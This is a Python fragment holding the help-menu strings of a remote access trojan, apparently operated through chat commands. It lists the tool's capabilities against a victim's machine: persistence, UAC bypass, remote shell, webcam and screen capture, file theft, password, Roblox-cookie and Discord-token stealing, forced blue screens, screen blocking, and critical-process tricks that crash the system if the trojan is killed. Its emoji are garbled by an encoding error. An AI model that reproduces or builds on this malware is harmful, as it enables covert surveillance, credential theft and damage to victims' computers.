help_menu = f"""
Available commands for **{os.getlogin()}** :
**!help** â - Shows this message
**!startup** đ - Adds the file to startup.
**!exit** â - Stop the RAT from working.
**!usagelist** đ - Returns a list of active users.
**!admin_check** đĄī¸ - Checks if you are admin on target computer.
**!bypass_uac** đ - Attempts to bypass UAC to get admin privileges.
**!shell** đģ - Run a shell command
`-----SURVEILLANCE-----` đ
**!screenshot** đ¸ - Sends a screenshot of the target machine
**!idletime** âŗ - Displays for how long the user has been AFK
**!webcam_capture** đˇ - Capture a picture of the webcam.
**!tasklist** đ - Returns a list of active tasks.
`-----FILE MANAGEMENT-----` đī¸
**!chdir** đ - Changes the current directory. **!chdir <** to go back one directory.
**!chdisk** đŊ - Changes the current disk. (E, C, D, etc.)
**!ls** đ - Displays all items in the current directory.
**!download** âŦī¸ - Downloads a file from the specified path.
**!upload** âŦī¸ - Uploads a file to the specified path.
**!taskkill** âī¸ - Kills the specified task.
**!startfile** âļī¸ - Starts a file.
**!delfile** đī¸ - Deletes a file.
**!hidefile** đĩī¸ââī¸ \ **!unhidefile** đī¸ - Hides/unhides a file.
`-----INFORMATION GATHERING-----` đĩī¸ââī¸
**!whois** đ¤ - Prints the user's name
**!getip** đ - Gets the current user's IP address
**!clipboard** đ - Returns a string of the user's clipboard.
**!grabpasswords** đ - Steal all the passwords from the device.
**!grabroblox** đŽ - Grabs the user's Roblox account cookie.
**!hardware_list** đĄ - Lists the user's hardware on newlines.
"""
help_menu2 = """
**!grabdiscord** đŦ - Fetches the user's Discord account token.
`-----SANCTIONING-----` đ¨
**!bsod** đĨ - Blue screens the computer.
**!disabletaskmgr** \ **!enabletaskmanager** đĢ \ â
- Disable/enable task manager.
**!logoff** đĒ - Logs the user off.
**!shutdown** đ´ - Shuts the user's PC off.
**!restart** đ - Restarts the user's PC.
**!blockscreen** đĢ - Blocks the user's screen. (IRREVERSIBLE UNTIL USER RESTARTS)
**!critproc** â ī¸ - Makes the RAT a critical process, meaning if it's task killed the user will get a BSOD.
**!screenflip** đ - Rotates the user's screen 90 degrees.
`-----FUN-----` đ
**!write** âī¸ - Writes a sentence then presses enter.
**!setclipboard** đ - Sets the clipboard to the specified string of text.
**!forcedesktop** đĨī¸ - Sends the user on desktop automatically.
**!messmouse** đąī¸ - Shakes the user's cursor when they try to move the mouse, run this command again to stop.
**!opensite** đ - Opens a site on the user's browser.
**!key_press** â¨ī¸ - Press a key.
**!showtaskbar** đĨī¸ \ **!hidetaskbar** đ
`-----COMMUNICATION-----` đ
**!questionmsg** â - Sends the user a question message.
**!warningmsg** â ī¸ - Sends the user a warning message.
**!errormsg** â - Sends the user an error message.
**!infomsg** âšī¸ - Sends the user an informative message.